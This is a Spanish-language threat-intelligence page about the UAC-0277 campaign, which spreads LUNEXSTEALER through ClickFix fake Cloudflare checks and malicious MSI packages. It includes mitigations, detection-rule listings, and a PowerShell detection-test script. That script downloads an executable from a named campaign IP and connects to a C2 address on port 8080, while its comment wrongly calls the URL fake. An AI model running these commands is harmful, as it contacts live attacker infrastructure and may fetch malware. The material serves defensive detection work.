SOC Prime Bias: High

06 Oct 2026 14:30 UTC

Ataques UAC-0277 Distribuyen LUNEXSTEALER a través de MSI Malicioso y ClickFix

Author Photo
SOC Prime Team linkedin icon Seguir
Ataques UAC-0277 Distribuyen LUNEXSTEALER a través de MSI Malicioso y ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Los actores de amenazas rastreados como UAC-0277 están comprometiendo sitios web legítimos para inyectar JavaScript malicioso que atrae a los usuarios a ejecutar comandos a través de una página de verificación de Cloudflare falsa. Esta técnica ClickFix finalmente entrega paquetes MSI que contienen LUNEXSTEALER o cargadores adicionales que emplean BYOVD para evadir controles de seguridad. La campaña también utiliza infraestructura de comando y control basada en blockchain en Polygon y Ethereum para gestionar dinámicamente los recursos del atacante.

Investigación

CERT-UA identificó más de 100 sitios web comprometidos y analizó tres variantes MSI asociadas con la campaña. Los investigadores observaron la carga lateral de DLL que involucra a FnHotkeyUtility.exe y la explotación del controlador vulnerable AMD PDFWKRNL.sys para eludir protecciones de Windows Defender. La investigación también descubrió la extensión de navegador LUNARAXE y el componente de PowerShell NAIVEMESS utilizados para recopilar y exfiltrar datos.

Mitigación

Los administradores deben restringir el acceso al diálogo Ejecutar (Win+R) a través de la Política de Grupo y limitar los privilegios de instalación de MSI a usuarios autorizados. Habilitar la lista de bloqueo de controladores vulnerables de Microsoft es esencial para reducir el riesgo de ataques BYOVD. Las organizaciones también deben aplicar listas blancas de extensiones de navegador y monitorear actividad sospechosa en la línea de comandos de msiexec.exe que involucre URLs remotas.

Respuesta

Cuando se detecte la ejecución sospechosa de MSI o extensiones de navegador no autorizadas, se debe aislar el host afectado y terminar los procesos asociados con LUNEXSTEALER. Revisar las tareas programadas en busca de entradas nombradas psychedelicloveUtils e inspeccionar los perfiles del navegador para la extensión Microsoft Office Word Editor. Cualquier página de verificación de Cloudflare falsa identificada asociada con la campaña debe ser reportada a CERT-UA.

Flujo de Ataque

Detecciones

Entrada RunMRU Sospechosa Con Semántica LOLBin (vía evento de registro)

Equipo de SOC Prime
05 Oct 2026

Posible Intento de Instalación Remota de Archivo MSI (vía línea de comandos)

Equipo de SOC Prime
05 Oct 2026

Tarea Programada Sospechosa (vía auditoría)

Equipo de SOC Prime
05 Oct 2026

Descarga de Archivo Directo Sospechosa por IP (vía proxy)

Equipo de SOC Prime
05 Oct 2026

Comando y Control Sospechoso por Solicitud DNS de Dominio de Nivel Superior (TLD) Inusual (vía DNS)

Equipo de SOC Prime
05 Oct 2026

IOCs (HashSha256) para detectar: Campaña UAC-0277: Despliegue de MSI Malicioso a través de la Técnica ClickFix y el Malware LUNEXSTEALER Parte 2

Reglas de AI de SOC Prime
06 Oct 2026

IOCs (HashSha256) para detectar: Campaña UAC-0277: Despliegue de MSI Malicioso a través de la Técnica ClickFix y el Malware LUNEXSTEALER Parte 1

Reglas de AI de SOC Prime
06 Oct 2026

IOCs (HashMd5) para detectar: Campaña UAC-0277: Despliegue de MSI Malicioso a través de la Técnica ClickFix y el Malware LUNEXSTEALER Parte 2

Reglas de AI de SOC Prime
06 Oct 2026

IOCs (HashMd5) para detectar: Campaña UAC-0277: Despliegue de MSI Malicioso a través de la Técnica ClickFix y el Malware LUNEXSTEALER Parte 1

Reglas de AI de SOC Prime
06 Oct 2026

IOCs (SourceIP) para detectar: Campaña UAC-0277: Despliegue de MSI Malicioso a través de la Técnica ClickFix y el Malware LUNEXSTEALER

Reglas de AI de SOC Prime
06 Oct 2026

IOCs (DestinationIP) para detectar: Campaña UAC-0277: Despliegue de MSI Malicioso a través de la Técnica ClickFix y el Malware LUNEXSTEALER

Reglas de AI de SOC Prime
06 Oct 2026

Detectar Interacción con Servidores C2 Maliciosos Usando HTTP y WebSocket [Conexión de Red de Windows]

Reglas de AI de SOC Prime
06 Oct 2026

FnHotkeyUtility Ejecutando spkvol.dll Malicioso a través de Carga Lateral de DLL [Windows Sysmon]

Reglas de AI de SOC Prime
06 Oct 2026

Descarga de Paquete MSI Malicioso usando Msiexec y Explotación de Vulnerabilidades [Creación de Procesos de Windows]

Reglas de AI de SOC Prime
06 Oct 2026

Detectar JavaScript Malicioso en Sitios Web Comprometidos [Servidor Web]

Reglas de AI de SOC Prime
06 Oct 2026

Ejecución de Simulación

  • Narrativa del Ataque & Comandos: El adversario ha realizado con éxito un compromiso de acceso remoto. Para establecer persistencia y descargar el malware de la siguiente etapa, el agente implantado intenta recuperar un archivo llamado psychedeliclove.exe desde un URI específico. Simultáneamente, el agente intenta enviar señales a un nodo C2 secundario ubicado en 193.178.159.128 en el puerto 8080 para recibir instrucciones a través de una conexión HTTP tipo WebSocket. Estos indicadores específicos están destinados a activar las reglas de detección basadas en proxy existentes.

  • Script de Prueba de Regresión:

    # Script de Simulación para Validación de Detección
    # Propósito: Activar los indicadores específicos de URL y IP/Puerto en la regla de detección.
    
    Write-Host "[*] Iniciando Simulación..." -ForegroundColor Cyan
    
    # 1. Activar Selección 1: Patrón de URL Maliciosa
    Write-Host "[*] Intentando acceder al patrón de URL maliciosa..." -ForegroundColor Yellow
    try {
        # Usamos un oyente local inexistente o una URL falsa para asegurarnos de no acceder realmente a un sitio malicioso,
        # pero el proxy aún debe registrar el intento de solicitud.
        Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue
    } catch {
        Write-Host "[!] Solicitud fallida (esperada), pero la telemetría debería generarse." -ForegroundColor Gray
    }
    
    # 2. Activar Selección 2: IP y Puerto Específicos
    Write-Host "[*] Intentando conectar a la IP C2 en el puerto 8080..." -ForegroundColor Yellow
    try {
        $client = New-Object System.Net.Sockets.TcpClient
        $client.Connect("193.178.159.128", 8080)
        $client.Close()
    } catch {
        Write-Host "[!] Conexión fallida (esperada), pero los logs del proxy deberían capturar el intento." -ForegroundColor Gray
    }
    
    Write-Host "[*] Simulación Completa." -ForegroundColor Cyan
  • Comandos de Limpieza:

    # No se crean archivos persistentes por esta simulación.
    # Solo se intentan conexiones de red temporales.
    Write-Host "[*] Limpieza completa. No se dejaron artefactos en el sistema." -ForegroundColor Green